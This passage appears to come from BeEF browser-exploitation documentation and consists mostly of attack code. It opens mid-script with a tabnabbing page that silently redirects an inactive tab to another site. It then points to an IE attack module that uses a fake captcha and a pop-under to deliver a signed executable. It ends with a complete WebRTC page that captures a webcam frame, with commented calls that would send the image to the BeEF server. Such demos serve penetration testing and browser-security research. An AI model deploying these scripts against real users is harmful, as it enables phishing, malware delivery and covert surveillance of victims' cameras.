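	var url = "http://beefproject.com/";
	var wait = 30000;
	var tabnab_timer = null;

	$('#output').append("waiting for tab to become inactive<br />");

	// Local (the original leaked begin_countdown as an implicit global) and
	// idempotent: a second blur without an intervening focus replaces the
	// pending timer instead of stacking a duplicate redirect.
	var begin_countdown = function() {
		clearTimeout(tabnab_timer);
		tabnab_timer = setTimeout(function() { window.location = url; }, wait);
	};

	// begin countdown when the tab loses focus
	$(window).blur(function(e) {
		begin_countdown();

	// stop countdown if the tab regains focus
	}).focus(function(e) {
		$('#output').append("timer killed - please change tab<br />");
		clearTimeout(tabnab_timer);
		tabnab_timer = null;
	});

});
</script>
</body>
</html>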

Abusing UI expectations on IE (Rosario Valotta attack)

Have a look at the BeEF module "ui_abuse_ie". It implements the attack and adds several tricks,
such as changing the fake captcha based on the browser language and overriding the body onclick event
to spawn the pop-under that serves the signed .exe.

https://github.com/beefproject/beef/blob/master/core/modules/social_engineering/ui_abuse_ie/command.js

WebRTC Camera Capture

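<html>
<head><title>This will capture your cam and display in another tab</title></head>
<body>

<script>

// Build the video element (hidden, autoplaying so frames are available to draw).
// style.display is set directly: assigning a string to .style is not
// supported everywhere.
var video_element = document.createElement("video");
video_element.id = "vid_id";
video_element.style.display = "none";
video_element.autoplay = true;

// Build the canvas element at the capture resolution
var canvas_element = document.createElement("canvas");
canvas_element.id = "can_id";
canvas_element.style.display = "none";
canvas_element.width = 640;
canvas_element.height = 480;

// Add the elements to the document's body
document.body.appendChild(video_element);
document.body.appendChild(canvas_element);

// 2D drawing context for the canvas (as opposed to a WebGL context)
var ctx = canvas_element.getContext('2d');

// Set once the camera stream has been granted
var localMediaStream = null;

// Called AFTER the media stream is set up: copies one frame to the canvas
// and pops it in a new tab as a data: URL. In a BeEF module the commented
// beef.net.send() calls would ship it to the server instead.
var captureimage = function() {
  if (localMediaStream) {
    ctx.drawImage(video_element, 0, 0);

    // beef.net.send("<%= @command_url %>",
    //   <%= @command_id %>,
    //   'image='+canvas_element.toDataURL('image/png'));
    // NOTE: most current browsers refuse top-level navigation to data: URLs,
    // so this window.open() may be blocked; writing an <img> into the new
    // window, or the beef.net.send() path above, is the robust alternative.
    window.open(canvas_element.toDataURL('image/png'));
  } else {
    // beef.net.send("<%= @command_url %>",
    //   <%= @command_id %>,
    //   'result=something went wrong');
    alert("Something went wrong");
  }
}

// Attaches the stream: srcObject is the current API; createObjectURL(MediaStream)
// is the legacy path and has been removed from current browsers.
var onstream = function(stream) {
  if ('srcObject' in video_element) {
    video_element.srcObject = stream;
  } else {
    window.URL = window.URL || window.webkitURL;
    video_element.src = window.URL.createObjectURL(stream);
  }

  // Copy the stream (this is checked in the captureimage func)
  localMediaStream = stream;

  // Give the camera a moment to deliver frames, then grab one
  setTimeout(captureimage, 2000);
};

// Permission denied, no camera, or no API at all
var onfail = function(err) {
  // beef.net.send("<%= @command_url %>",
  //   <%= @command_id %>,
  //   'result=getUserMedia call failed');
  alert("Couldn't get stream");
};

// Prompt for permission to grab the camera: promise-based API first,
// then the vendor-prefixed callback forms.
if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
  navigator.mediaDevices.getUserMedia({video:true}).then(onstream, onfail);
} else {
  var legacyGetUserMedia = navigator.getUserMedia ||
                           navigator.webkitGetUserMedia ||
                           navigator.mozGetUserMedia ||
                           navigator.msGetUserMedia;
  if (legacyGetUserMedia) {
    legacyGetUserMedia.call(navigator, {video:true}, onstream, onfail);
  } else {
    onfail(new Error("getUserMedia unsupported"));
  }
}


</script>

</body>
</html>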